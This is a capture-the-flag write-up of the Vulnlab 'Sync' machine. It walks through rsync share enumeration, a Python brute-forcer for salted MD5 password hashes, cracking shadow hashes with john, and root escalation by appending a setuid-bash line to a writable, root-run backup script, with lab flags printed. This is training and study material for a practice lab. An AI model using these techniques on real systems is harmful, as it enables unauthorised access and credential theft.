Vulnlab Sync

Sync VL

NMAP Scanning:

└─$ nmap -A -sC -sV -p21,22,80,873 10.10.110.93 -Pn                                    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-10 13:36 EST
Nmap scan report for 10.10.110.93
Host is up (0.041s latency).

PORT    STATE SERVICE VERSION
21/tcp  open  ftp     vsftpd 3.0.5
22/tcp  open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 1b:97:60:11:e9:dd:3d:1d:ce:18:d3:ca:12:e5:13:fb (ECDSA)
|_  256 84:94:57:1a:0c:0d:90:ec:27:f9:65:fb:a0:85:39:f2 (ED25519)
80/tcp  open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Login
873/tcp open  rsync   (protocol version 31)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.11 (93%), Linux 3.2 - 4.9 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 21/tcp)
HOP RTT      ADDRESS
1   39.90 ms 10.8.0.1
2   40.07 ms 10.10.110.93

FTP - Checking:

└─$ ftp sync.vl                                                                      
Connected to sync.vl.
220 (vsFTPd 3.0.5)
Name (sync.vl:kali): anonymous
530 Permission denied.
ftp: Login failed
ftp> 
ftp> exit
221 Goodbye.

RSYNC - Checking:

List shares: rsync -av --list-only rsync://$IP

Listing a shared folder: rsync -av --list-only rsync://$IP/$FOLDER

Copying files from the shared folder: rsync -av rsync://$IP/$SHARE ./rsync_share

└─$ rsync -av --list-only rsync://10.10.110.93
httpd           web backup

Copying the files from the folders:

└─$ rsync -av rsync://10.10.110.93/httpd httpd/  
receiving incremental file list
./
db/
db/site.db
migrate/
www/
www/dashboard.php
www/index.php
www/logout.php

HTTP - Directory Listing:

└─$ wfuzz -u http://sync.vl/FUZZ.php -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --hw 31
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://sync.vl/FUZZ.php
Total requests: 220559

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                     
=====================================================================

000000003:   200        25 L     60 W       1392 Ch     "# Copyright 2007 James Fisher"                                                                                             
000000007:   200        25 L     60 W       1392 Ch     "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"                                                           
000000001:   200        25 L     60 W       1392 Ch     "# directory-list-2.3-medium.txt"                                                                                           
000000015:   200        25 L     60 W       1392 Ch     "index"                                                                                                                     
000000009:   200        25 L     60 W       1392 Ch     "# Suite 300, San Francisco, California, 94105, USA."                                                                       
000000012:   200        25 L     60 W       1392 Ch     "# on at least 2 different hosts"                                                                                           
000000008:   200        25 L     60 W       1392 Ch     "# or send a letter to Creative Commons, 171 Second Street,"                                                                
000000011:   200        25 L     60 W       1392 Ch     "# Priority ordered case-sensitive list, where entries were found"                                                          
000000006:   200        25 L     60 W       1392 Ch     "# Attribution-Share Alike 3.0 License. To view a copy of this"                                                             
000000014:   403        9 L      28 W       272 Ch      "http://sync.vl/.php"                                                                                                       
000000010:   200        25 L     60 W       1392 Ch     "#"                                                                                                                         
000000013:   200        25 L     60 W       1392 Ch     "#"                                                                                                                         
000000005:   200        25 L     60 W       1392 Ch     "# This work is licensed under the Creative Commons"                                                                        
000000004:   200        25 L     60 W       1392 Ch     "#"                                                                                                                         
000000002:   200        25 L     60 W       1392 Ch     "#"                                                                                                                         
000001225:   302        0 L      0 W        0 Ch        "logout"                                                                                                                    
000002927:   302        0 L      0 W        0 Ch        "dashboard"

DB - Dumping & Cracking users passwords:

└─$ sqlite3 site.db      
SQLite version 3.46.1 2024-08-13 09:16:08
Enter ".help" for usage hints.
sqlite> .tables
users
sqlite> select * from users;
1|admin|7658a2741c9df3a97c819584db6e6b3c
2|triss|a0de4d7f81676c3ea9eabcadfd2536f6
sqlite>

But unfortunately we can’t crack the hashes since we don’t know their format and also john or hashcat don’t know it. So need to see, how the hash was created:

<?php
session_start();
$secure = "6c4972f3717a5e881e282ad3105de01e";

if (isset($_SESSION['username'])) {
    header('Location: dashboard.php');
    exit();
}

if (isset($_POST['username']) && isset($_POST['password'])) {
    $username = $_POST['username'];
    $password = $_POST['password'];

    $hash = md5("$secure|$username|$password");
    $db = new SQLite3('../db/site.db');
    $result = $db->query("SELECT * FROM users WHERE username = '$username' AND password= '$hash'");
    $row = $result->fetchArray(SQLITE3_ASSOC);
    if ($row) {
        $_SESSION['username'] = $row['username'];
        header('Location: dashboard.php');
        exit();
    } else {
        $error_message = 'Invalid username or password.';
    }
}

So giving this data to deepseek, he was able to craft me a python script that will create the hashes and bruteforce them using the rockyou.txt:

└─$ cat brute.py 
import hashlib

# Define the secure string and the target hashes
secure = "6c4972f3717a5e881e282ad3105de01e"
target_hashes = {
    "admin": "7658a2741c9df3a97c819584db6e6b3c",
    "triss": "a0de4d7f81676c3ea9eabcadfd2536f6"
}

# Path to the rockyou.txt wordlist
wordlist_path = "/usr/share/wordlists/rockyou.txt"

# Function to generate the hash
def generate_hash(username, password):
    combined = f"{secure}|{username}|{password}"
    return hashlib.md5(combined.encode()).hexdigest()

# Function to brute-force the hashes
def brute_force_hashes():
    with open(wordlist_path, 'r', encoding='latin-1') as wordlist:
        for password in wordlist:
            password = password.strip()
            for username, target_hash in target_hashes.items():
                generated_hash = generate_hash(username, password)
                if generated_hash == target_hash:
                    print(f"Found match: Username: {username}, Password: {password}")
                    return

    print("No matches found.")

if __name__ == "__main__":
    brute_force_hashes()

→ output of the script:

└─$ python3 brute.py 
Found match: Username: triss, Password: gerald

Now with those credentials we can try do connect via ftp and ssh since we saw that on the web portal we can’t do really anything:

└─$ ftp sync.vl                                                                                                     
Connected to sync.vl.
220 (vsFTPd 3.0.5)
Name (sync.vl:kali): triss
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||17383|)
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -la
229 Entering Extended Passive Mode (|||53979|)
150 Here comes the directory listing.
drwxr-x---    2 1003     1003         4096 Apr 21  2023 .
drwxr-x---    2 1003     1003         4096 Apr 21  2023 ..
lrwxrwxrwx    1 0        0               9 Apr 21  2023 .bash_history -> /dev/null
-rw-r--r--    1 1003     1003          220 Apr 19  2023 .bash_logout
-rw-r--r--    1 1003     1003         3771 Apr 19  2023 .bashrc
-rw-r--r--    1 1003     1003          807 Apr 19  2023 .profile
226 Directory send OK.
ftp>

And we can see that we have acess to triss users home folder. With this in mind we can create a .ssh folder where we can put our public key in order to connect to it.

triss@ip-10-10-200-238:~$ cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=22.04
DISTRIB_CODENAME=jammy
DISTRIB_DESCRIPTION="Ubuntu 22.04.2 LTS"
PRETTY_NAME="Ubuntu 22.04.2 LTS"
NAME="Ubuntu"
VERSION_ID="22.04"
VERSION="22.04.2 LTS (Jammy Jellyfish)"
VERSION_CODENAME=jammy
ID=ubuntu
ID_LIKE=debian
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
UBUNTU_CODENAME=jammy

Using the password we cracked for the user triss we can connect as the janiffer’s user:

triss@ip-10-10-200-238:/tmp$ su - jennifer
Password: 
jennifer@ip-10-10-200-238:~$ ls -lah
total 24K
drwxr-x--- 2 jennifer jennifer 4.0K Apr 21  2023 .
drwxr-xr-x 7 root     root     4.0K Apr 19  2023 ..
lrwxrwxrwx 1 root     root        9 Apr 21  2023 .bash_history -> /dev/null
-rw-r--r-- 1 jennifer jennifer  220 Apr 19  2023 .bash_logout
-rw-r--r-- 1 jennifer jennifer 3.7K Apr 19  2023 .bashrc
-rw-r--r-- 1 jennifer jennifer  807 Apr 19  2023 .profile
-rw-r--r-- 1 jennifer jennifer   37 Apr 19  2023 user.txt
jennifer@ip-10-10-200-238:~$ cat user.txt
VL{bcf845cf94864fbba7e016d9fcd3a2db}

In the root folder we can see a backup folder containing some strange zip files. Extracting one of them reveal the following content:

jennifer@ip-10-10-200-238:/tmp$ unzip 1739211482.zip 
Archive:  1739211482.zip
   creating: tmp/backup/
  inflating: tmp/backup/rsyncd.conf  
   creating: tmp/backup/httpd/
   creating: tmp/backup/httpd/www/
  inflating: tmp/backup/httpd/www/dashboard.php  
  inflating: tmp/backup/httpd/www/logout.php  
  inflating: tmp/backup/httpd/www/index.php  
   creating: tmp/backup/httpd/migrate/
   creating: tmp/backup/httpd/db/
  inflating: tmp/backup/httpd/db/site.db  
  inflating: tmp/backup/passwd       
  inflating: tmp/backup/shadow

Now we have the passwd and shadow files. With those files we can unshadow them and crack the users hashes using john the ripper:

┌──(kali㉿kali)-[~/Desktop/Workspace/Vulnlab/sync.vl]
└─$ unshadow passwd shadow > unshadow
                                                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Workspace/Vulnlab/sync.vl]
└─$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt unshadow
Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts (crypt, generic crypt(3) [?/64])
Cost 1 (algorithm [1:descrypt 2:md5crypt 3:sunmd5 4:bcrypt 5:sha256crypt 6:sha512crypt]) is 0 for all loaded hashes
Cost 2 (algorithm specific iterations) is 1 for all loaded hashes
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sakura           (sa)     
gerald           (jennifer)     
gerald           (triss)

So let’s switch to the sa user using the password sakura and run linpeas in order to find privilege escalation vectors:

╔══════════╣ .sh files in path
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scriptbinaries-in-path                                                                                     
You own the script: /usr/local/bin/backup.sh                                                                                                                                                 
/usr/bin/gettext.sh
/usr/bin/rescan-scsi-bus.sh

And we can see an interesting backup script:

sa@ip-10-10-200-238:/tmp/...$ cat /usr/local/bin/backup.sh 
#!/bin/bash

mkdir -p /tmp/backup
cp -r /opt/httpd /tmp/backup
cp /etc/passwd /tmp/backup
cp /etc/shadow /tmp/backup
cp /etc/rsyncd.conf /tmp/backup
zip -r /backup/$(date +%s).zip /tmp/backup
rm -rf /tmp/backup

We can assume that the user root executes this script so let’s modify it so we can get a reverse shell as root:

sa@ip-10-10-200-238:/tmp/...$ echo 'cp /bin/bash /tmp/bash_root && chmod 4755 /tmp/bash_root' >> /usr/local/bin/backup.sh 
sa@ip-10-10-200-238:/tmp/...$ cat /usr/local/bin/backup.sh 
#!/bin/bash

mkdir -p /tmp/backup
cp -r /opt/httpd /tmp/backup
cp /etc/passwd /tmp/backup
cp /etc/shadow /tmp/backup
cp /etc/rsyncd.conf /tmp/backup
zip -r /backup/$(date +%s).zip /tmp/backup
rm -rf /tmp/backup
cp /bin/bash /tmp/bash_root && chmod 4755 /tmp/bash_root

sa@ip-10-10-200-238:/tmp/...$ ls -lah /tmp
total 1.4M
drwxrwxrwt 15 root     root     4.0K Feb 10 19:12 .
drwxr-xr-x 20 root     root     4.0K Feb 10 18:17 ..
drwxrwxr-x  2 sa       sa       4.0K Feb 10 19:05 ...
drwxrwxrwt  2 root     root     4.0K Feb 10 18:17 .ICE-unix
drwxrwxrwt  2 root     root     4.0K Feb 10 18:17 .Test-unix
drwxrwxrwt  2 root     root     4.0K Feb 10 18:17 .X11-unix
drwxrwxrwt  2 root     root     4.0K Feb 10 18:17 .XIM-unix
drwxrwxrwt  2 root     root     4.0K Feb 10 18:17 .font-unix
-rw-r--r--  1 jennifer jennifer 5.8K Feb 10 18:59 1739211482.zip
-rwsr-xr-x  1 root     root     1.4M Feb 10 19:12 bash_root
drwx------  3 root     root     4.0K Feb 10 18:17 snap-private-tmp
drwx------  3 root     root     4.0K Feb 10 18:17 systemd-private-5924f26320a14ec2a34d5774c143fbc3-apache2.service-bsejjE
drwx------  3 root     root     4.0K Feb 10 18:17 systemd-private-5924f26320a14ec2a34d5774c143fbc3-chrony.service-031XHP
drwx------  3 root     root     4.0K Feb 10 18:17 systemd-private-5924f26320a14ec2a34d5774c143fbc3-systemd-logind.service-7zbwkj
drwx------  3 root     root     4.0K Feb 10 18:17 systemd-private-5924f26320a14ec2a34d5774c143fbc3-systemd-resolved.service-aNYEQb
drwxrwxr-x  3 jennifer jennifer 4.0K Feb 10 18:59 tmp
drwx------  2 sa       sa       4.0K Feb 10 19:05 tmux-1001

sa@ip-10-10-200-238:/tmp/...$ /tmp/bash_root -p
bash_root-5.1# whoami
root
bash_root-5.1# cd /root
bash_root-5.1# ls -lah
total 44K
drwx------  6 root root 4.0K Apr 21  2023 .
drwxr-xr-x 20 root root 4.0K Feb 10 18:17 ..
lrwxrwxrwx  1 root root    9 Apr 20  2023 .bash_history -> /dev/null
-rw-r--r--  1 root root 3.1K Oct 15  2021 .bashrc
drwxr-xr-x  2 root root 4.0K Apr 20  2023 .deploy
-rw-------  1 root root   20 Apr 20  2023 .lesshst
drwxr-xr-x  3 root root 4.0K Apr 19  2023 .local
-rw-r--r--  1 root root  161 Jul  9  2019 .profile
-rw-r--r--  1 root root   66 Apr 19  2023 .selected_editor
drwx------  2 root root 4.0K Apr 19  2023 .ssh
-rw-r--r--  1 root root   37 Apr 19  2023 root.txt
drwx------  4 root root 4.0K Apr 19  2023 snap
bash_root-5.1# cat root.txt
VL{1ce8506d2bec0abb03177353db237e1b}
bash_root-5.1#